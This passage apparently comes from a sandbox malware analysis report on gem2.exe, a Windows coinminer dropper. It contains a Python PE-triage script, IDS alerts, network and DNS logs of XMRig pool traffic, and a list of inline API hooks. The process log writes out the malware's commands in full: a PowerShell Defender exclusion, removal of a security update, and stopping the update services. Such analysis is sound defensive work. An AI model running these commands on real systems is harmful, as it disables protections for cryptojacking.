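    return header + bodies


def parse_pe(data):
    """Read the COFF header, optional header, data directories and section table of a PE32+."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    fh = e_lfanew + 4
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, fh)
    opt = fh + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x20B:
        raise ValueError("only PE32+ images are handled here")
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]
    ndirs = struct.unpack_from("<I", data, opt + 108)[0]
    dirs = [struct.unpack_from("<II", data, opt + 112 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsec):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "raw_size": raw_size, "raw_ptr": raw_ptr, "chars": chars})
    return {"subsystem": subsystem, "dirs": dirs, "sections": sections, "file_size": len(data)}


def triage(pe):
    """Header-level red flags of the kind the tables above expose."""
    findings = []
    for s in pe["sections"]:
        share = s["raw_size"] / pe["file_size"]
        if share > 0.90:
            findings.append(f"{s['name']} carries {share:.1%} of the file: embedded payload likely")
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE:
            findings.append(f"{s['name']} is writable and executable")
    if pe["dirs"][DIR_TLS][1]:
        findings.append("TLS directory present: TLS callbacks run before the entrypoint")
    if pe["dirs"][DIR_SECURITY][1] == 0:
        findings.append("security directory empty: no Authenticode signature")
    if pe["subsystem"] == IMAGE_SUBSYSTEM_NATIVE:
        findings.append("NATIVE subsystem: a kernel-mode driver, not a user-mode program")
    return findings


# gem2.exe's layout; the TLS directory RVA/size are those in the data-directory table.
GEM2 = build_pe(GEM2_SECTIONS, IMAGE_SUBSYSTEM_WINDOWS_GUI, tls_dir=(0xb0a0, 0x28))
# Only the subsystem of the dropped "native" file is mimicked here (constructed stand-in).
DRIVER = build_pe(GEM2_SECTIONS[:2], IMAGE_SUBSYSTEM_NATIVE)

if __name__ == "__main__":
    for label, image in (("gem2.exe layout", GEM2), ("dropped driver stand-in", DRIVER)):
        print(f"{label}: {len(image)} bytes")
        for finding in triage(parse_pe(image)):
            print("  -", finding)
```

With the report's raw sizes the constructed image comes out at 2,876,416 bytes, the same as the submitted file, and .data accounts for 98.3% of it, which is the header-level hint that the miner and driver are carried as embedded data rather than compiled into .text.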
Resources

Name       | RVA      | Size  | Type             | Language | Country       | ZLIB Complexity
RT_VERSION | 0x2c5060 | 0x2f0 | SysEx File - IDP | English  | United States | 0.449468085106383
Imports

DLL          | Import
msvcrt.dll   | __C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp
KERNEL32.dll | DeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
Language of compilation system | Country where language is spoken
English                        | United States
Network IDS alerts

Timestamp                       | SID     | Signature                                                            | Severity | Source IP   | Source Port | Dest IP       | Dest Port | Protocol
2025-01-10T10:15:53.890023+0100 | 2826930 | ETPRO COINMINER XMR CoinMiner Usage                                  | 2        | 192.168.2.5 | 49704       | 141.94.96.144 | 80        | TCP
2025-01-10T10:16:08.375586+0100 | 2047928 | ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com)    | 2        | 192.168.2.5 | 60174       | 1.1.1.1       | 53        | UDP
TCP packets

Timestamp                         | Source Port | Dest Port | Source IP     | Dest IP
Jan 10, 2025 10:16:08.388164043 CET | 49704 | 80    | 192.168.2.5   | 141.94.96.144
Jan 10, 2025 10:16:08.393201113 CET | 80    | 49704 | 141.94.96.144 | 192.168.2.5
Jan 10, 2025 10:16:08.393892050 CET | 49704 | 80    | 192.168.2.5   | 141.94.96.144
Jan 10, 2025 10:16:08.393892050 CET | 49704 | 80    | 192.168.2.5   | 141.94.96.144
Jan 10, 2025 10:16:08.399065018 CET | 80    | 49704 | 141.94.96.144 | 192.168.2.5
Jan 10, 2025 10:16:09.015577078 CET | 80    | 49704 | 141.94.96.144 | 192.168.2.5
Jan 10, 2025 10:16:09.061813116 CET | 49704 | 80    | 192.168.2.5   | 141.94.96.144
Jan 10, 2025 10:16:16.436534882 CET | 80    | 49704 | 141.94.96.144 | 192.168.2.5
Jan 10, 2025 10:16:16.608546019 CET | 49704 | 80    | 192.168.2.5   | 141.94.96.144
Jan 10, 2025 10:16:17.384366035 CET | 50294 | 53    | 192.168.2.5   | 1.1.1.1
Jan 10, 2025 10:16:17.389271975 CET | 53    | 50294 | 1.1.1.1       | 192.168.2.5
Jan 10, 2025 10:16:17.389355898 CET | 50294 | 53    | 192.168.2.5   | 1.1.1.1
Jan 10, 2025 10:16:17.389399052 CET | 50294 | 53    | 192.168.2.5   | 1.1.1.1
Jan 10, 2025 10:16:17.394181013 CET | 53    | 50294 | 1.1.1.1       | 192.168.2.5
Jan 10, 2025 10:16:17.852317095 CET | 53    | 50294 | 1.1.1.1       | 192.168.2.5
Jan 10, 2025 10:16:17.854166985 CET | 50294 | 53    | 192.168.2.5   | 1.1.1.1
Jan 10, 2025 10:16:17.859652996 CET | 53    | 50294 | 1.1.1.1       | 192.168.2.5
Jan 10, 2025 10:16:17.859713078 CET | 50294 | 53    | 192.168.2.5   | 1.1.1.1
Jan 10, 2025 10:16:26.792152882 CET | 80    | 49704 | 141.94.96.144 | 192.168.2.5
Jan 10, 2025 10:16:26.842930079 CET | 49704 | 80    | 192.168.2.5   | 141.94.96.144
Jan 10, 2025 10:16:42.813124895 CET | 80    | 49704 | 141.94.96.144 | 192.168.2.5
Jan 10, 2025 10:16:42.858817101 CET | 49704 | 80    | 192.168.2.5   | 141.94.96.144
Jan 10, 2025 10:16:43.119462967 CET | 56302 | 53    | 192.168.2.5   | 162.159.36.2
Jan 10, 2025 10:16:43.124329090 CET | 53    | 56302 | 162.159.36.2  | 192.168.2.5
Jan 10, 2025 10:16:43.124408960 CET | 56302 | 53    | 192.168.2.5   | 162.159.36.2
Jan 10, 2025 10:16:43.126420021 CET | 56302 | 53    | 192.168.2.5   | 162.159.36.2
Jan 10, 2025 10:16:43.131407976 CET | 53    | 56302 | 162.159.36.2  | 192.168.2.5
Jan 10, 2025 10:16:43.585133076 CET | 53    | 56302 | 162.159.36.2  | 192.168.2.5
Jan 10, 2025 10:16:43.585324049 CET | 56302 | 53    | 192.168.2.5   | 162.159.36.2
Jan 10, 2025 10:16:43.590455055 CET | 53    | 56302 | 162.159.36.2  | 192.168.2.5
Jan 10, 2025 10:16:43.590512037 CET | 56302 | 53    | 192.168.2.5   | 162.159.36.2
Jan 10, 2025 10:17:02.004745960 CET | 80    | 49704 | 141.94.96.144 | 192.168.2.5
Jan 10, 2025 10:17:02.061851978 CET | 49704 | 80    | 192.168.2.5   | 141.94.96.144
Jan 10, 2025 10:17:24.294970989 CET | 80    | 49704 | 141.94.96.144 | 192.168.2.5
Jan 10, 2025 10:17:24.405498028 CET | 49704 | 80    | 192.168.2.5   | 141.94.96.144
Jan 10, 2025 10:17:35.474283934 CET | 80    | 49704 | 141.94.96.144 | 192.168.2.5
Jan 10, 2025 10:17:35.593220949 CET | 49704 | 80    | 192.168.2.5   | 141.94.96.144
Jan 10, 2025 10:17:50.287472010 CET | 80    | 49704 | 141.94.96.144 | 192.168.2.5
Jan 10, 2025 10:17:50.405512094 CET | 49704 | 80    | 192.168.2.5   | 141.94.96.144
Jan 10, 2025 10:18:02.472278118 CET | 80    | 49704 | 141.94.96.144 | 192.168.2.5
Jan 10, 2025 10:18:02.608628035 CET | 49704 | 80    | 192.168.2.5   | 141.94.96.144
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 10:16:08.375586033 CET | 60174 | 53 | 192.168.2.5 | 1.1.1.1
Jan 10, 2025 10:16:08.383467913 CET | 53 | 60174 | 1.1.1.1 | 192.168.2.5
Jan 10, 2025 10:16:17.382879972 CET | 53 | 60615 | 1.1.1.1 | 192.168.2.5
Jan 10, 2025 10:16:43.119062901 CET | 53 | 52406 | 162.159.36.2 | 192.168.2.5
Jan 10, 2025 10:16:43.595828056 CET | 53 | 50335 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 10:16:08.375586033 CET | 192.168.2.5 | 1.1.1.1 | 0x8dfc | Standard query (0) | pool.supportxmr.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 10:16:08.383467913 CET | 1.1.1.1 | 192.168.2.5 | 0x8dfc | No error (0) | pool.supportxmr.com | pool-fr.supportxmr.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 10:16:08.383467913 CET | 1.1.1.1 | 192.168.2.5 | 0x8dfc | No error (0) | pool-fr.supportxmr.com |  | 141.94.96.195 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 10:16:08.383467913 CET | 1.1.1.1 | 192.168.2.5 | 0x8dfc | No error (0) | pool-fr.supportxmr.com |  | 141.94.96.71 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 10:16:08.383467913 CET | 1.1.1.1 | 192.168.2.5 | 0x8dfc | No error (0) | pool-fr.supportxmr.com |  | 141.94.96.144 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 10:16:14.608594894 CET | 1.1.1.1 | 192.168.2.5 | 0xf5dd | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 10:16:14.608594894 CET | 1.1.1.1 | 192.168.2.5 | 0xf5dd | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 10:18:05.976294994 CET | 1.1.1.1 | 192.168.2.5 | 0x5e45 | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 10:18:05.976294994 CET | 1.1.1.1 | 192.168.2.5 | 0x5e45 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | 217.20.57.35 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 10:18:05.976294994 CET | 1.1.1.1 | 192.168.2.5 | 0x5e45 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | 84.201.210.39 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 10:18:05.976294994 CET | 1.1.1.1 | 192.168.2.5 | 0x5e45 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | 217.20.57.36 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 10:18:05.976294994 CET | 1.1.1.1 | 192.168.2.5 | 0x5e45 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | 217.20.57.34 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 10:18:05.976294994 CET | 1.1.1.1 | 192.168.2.5 | 0x5e45 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | 84.201.210.23 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 10:18:05.976294994 CET | 1.1.1.1 | 192.168.2.5 | 0x5e45 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | 217.20.57.19 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 10:18:05.976294994 CET | 1.1.1.1 | 192.168.2.5 | 0x5e45 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | 217.20.57.20 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 10:18:05.976294994 CET | 1.1.1.1 | 192.168.2.5 | 0x5e45 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com |  | 217.20.57.18 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 141.94.96.144 | 80 | 7720 | C:\Windows\System32\dialer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 10:16:08.393892050 CET | 596 | OUT | Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 36 4d 33 39 44 4d 31 44 51 6a 46 4b 55 6e 54 33 74 32 4b 69 48
                                                                              Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"46M39DM1DQjFKUnT3t2KiHNU6qQjmRF79J31fSbtBNafUX9B2gAwysjLFADQ5mhqR4M6C8JJRFXwLPxDHapuCrHE3mRBjTw","pass":"Ultima","agent":"XMRig/6.19.3 (Windows NT 10.0; Win64; x64) libuv/1.38.0 msvc/
Jan 10, 2025 10:16:09.015577078 CET | 538 | IN | Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 65 38 66 38 65 39 39 34 2d 32 31 36 39 2d 34 61 32 65 2d 61 63 63 38 2d 65 30 63 37 35
                                                                              Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"e8f8e994-2169-4a2e-acc8-e0c75b3b642e","job":{"blob":"1010d5ca83bc0634fe492ac832aa1543667c6582a369b9f2475a3cc66ab8e3374ac653bc72b2e900000000e4ca76ca8bbef9ca2fc970454a16da2d22485220e56fe6bb644
Jan 10, 2025 10:16:16.436534882 CET | 420 | IN | Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 64 66 63 61 38 33 62 63 30 36 33 34 66 65 34 39 32 61 63 38 33 32 61 61 31 35 34 33
                                                                              Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010dfca83bc0634fe492ac832aa1543667c6582a369b9f2475a3cc66ab8e3374ac653bc72b2e9000000000947dd404a12f426f95845e20674127ad9dbc71a008f4ffb0dd66479a304578432","job_id":"nfWQgLsMZ8GInFD0hFgmhebqleLq"
Jan 10, 2025 10:16:26.792152882 CET | 420 | IN | Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 61 63 61 38 33 62 63 30 36 33 34 66 65 34 39 32 61 63 38 33 32 61 61 31 35 34 33
                                                                              Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010eaca83bc0634fe492ac832aa1543667c6582a369b9f2475a3cc66ab8e3374ac653bc72b2e900000000b47ba232c74d01b2b43e0033cdaf5f25b0357e8e923845984bc6e86116ac5bb636","job_id":"F7s3gATm+b/1wn8mFNiTRzW98F1P"
Jan 10, 2025 10:16:42.813124895 CET | 420 | IN | Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 66 61 63 61 38 33 62 63 30 36 33 34 66 65 34 39 32 61 63 38 33 32 61 61 31 35 34 33
                                                                              Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010faca83bc0634fe492ac832aa1543667c6582a369b9f2475a3cc66ab8e3374ac653bc72b2e900000000f083df92812ba472d6471dcb5b030626c2bb1ffe83967cdf9b4ad97de9b8d4003c","job_id":"qOwl+pj91emLAHG8+mlavDHj9a1t"
Jan 10, 2025 10:17:02.004745960 CET | 420 | IN | Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 64 63 62 38 33 62 63 30 36 33 34 66 65 34 39 32 61 63 38 33 32 61 61 31 35 34 33
                                                                              Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"10108dcb83bc0634fe492ac832aa1543667c6582a369b9f2475a3cc66ab8e3374ac653bc72b2e90000000054592777daa1dc07ba211b0bacd7591cd19b1615d80eb6c3296af220b4fc15313e","job_id":"hHRXZ1eu5bsbTX1e91HSf8qbZ+3P"
Jan 10, 2025 10:17:24.294970989 CET | 420 | IN | Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 61 33 63 62 38 33 62 63 30 36 33 34 66 65 34 39 32 61 63 38 33 32 61 61 31 35 34 33
                                                                              Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010a3cb83bc0634fe492ac832aa1543667c6582a369b9f2475a3cc66ab8e3374ac653bc72b2e900000000cf010714010cd5572cd2300f1d6ff089629542c184a65d9ab86460e11143abfb45","job_id":"X14Nsb5vbQEDX14fXzM2LAWiCzdE"
Jan 10, 2025 10:17:35.474283934 CET | 420 | IN | Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 61 65 63 62 38 33 62 63 30 36 33 34 66 65 34 39 32 61 63 38 33 32 61 61 31 35 34 33
                                                                              Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010aecb83bc0634fe492ac832aa1543667c6582a369b9f2475a3cc66ab8e3374ac653bc72b2e900000000161711aee4ee7d09f028c6809145c22eda8d400388593e97805af607d90f34d147","job_id":"OCg718AGkji+Put01QSGDUrdn1ZG"
Jan 10, 2025 10:17:50.287472010 CET | 420 | IN | Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 64 63 62 38 33 62 63 30 36 33 34 66 65 34 39 32 61 63 38 33 32 61 61 31 35 34 33
                                                                              Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010bdcb83bc0634fe492ac832aa1543667c6582a369b9f2475a3cc66ab8e3374ac653bc72b2e900000000ba23df2e6f6bb593cde3faa97f595c6616c3663a3f3c435382b853a01873d1334b","job_id":"CJheU9azC6feI9mUObD9xc5moW1X"
Jan 10, 2025 10:18:02.472278118 CET | 420 | IN | Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 63 39 63 62 38 33 62 63 30 36 33 34 66 65 34 39 32 61 63 38 33 32 61 61 31 35 34 33
                                                                              Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010c9cb83bc0634fe492ac832aa1543667c6582a369b9f2475a3cc66ab8e3374ac653bc72b2e900000000eadd873f8fe805e90bc69caa6936f21f23992a8bb65edd2ccf681d60f54349454e","job_id":"AHaeV7TH9eAt+clQKSkNiaLud9Wo"


                                                                              Code Manipulations

Function Name | Hook Type | Active in Processes
ZwEnumerateKey | INLINE | winlogon.exe, explorer.exe
NtQuerySystemInformation | INLINE | winlogon.exe, explorer.exe
ZwResumeThread | INLINE | winlogon.exe, explorer.exe
NtDeviceIoControlFile | INLINE | winlogon.exe, explorer.exe
ZwDeviceIoControlFile | INLINE | winlogon.exe, explorer.exe
NtEnumerateKey | INLINE | winlogon.exe, explorer.exe
NtQueryDirectoryFile | INLINE | winlogon.exe, explorer.exe
ZwEnumerateValueKey | INLINE | winlogon.exe, explorer.exe
ZwQuerySystemInformation | INLINE | winlogon.exe, explorer.exe
NtResumeThread | INLINE | winlogon.exe, explorer.exe
RtlGetNativeSystemInformation | INLINE | winlogon.exe, explorer.exe
NtQueryDirectoryFileEx | INLINE | winlogon.exe, explorer.exe
NtEnumerateValueKey | INLINE | winlogon.exe, explorer.exe
ZwQueryDirectoryFileEx | INLINE | winlogon.exe, explorer.exe
ZwQueryDirectoryFile | INLINE | winlogon.exe, explorer.exe

Function Name | Hook Type | New Data
ZwEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Function Name | Hook Type | New Data
ZwEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF


                                                                              Target ID:0
                                                                              Start time:04:15:57
                                                                              Start date:10/01/2025
                                                                              Path:C:\Users\user\Desktop\gem2.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\Desktop\gem2.exe"
                                                                              Imagebase:0x7ff72a7b0000
                                                                              File size:2'876'416 bytes
                                                                              MD5 hash:990A3F3B1273510F210FB9B541DA219F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:1
                                                                              Start time:04:15:57
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                              Imagebase:0x7ff7be880000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:04:15:57
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:5
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                              Imagebase:0x7ff6218c0000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:6
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                              Imagebase:0x7ff6bbbe0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:7
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:8
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:9
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\wusa.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                              Imagebase:0x7ff6085f0000
                                                                              File size:345'088 bytes
                                                                              MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:10
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                              Imagebase:0x7ff6bbbe0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:11
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
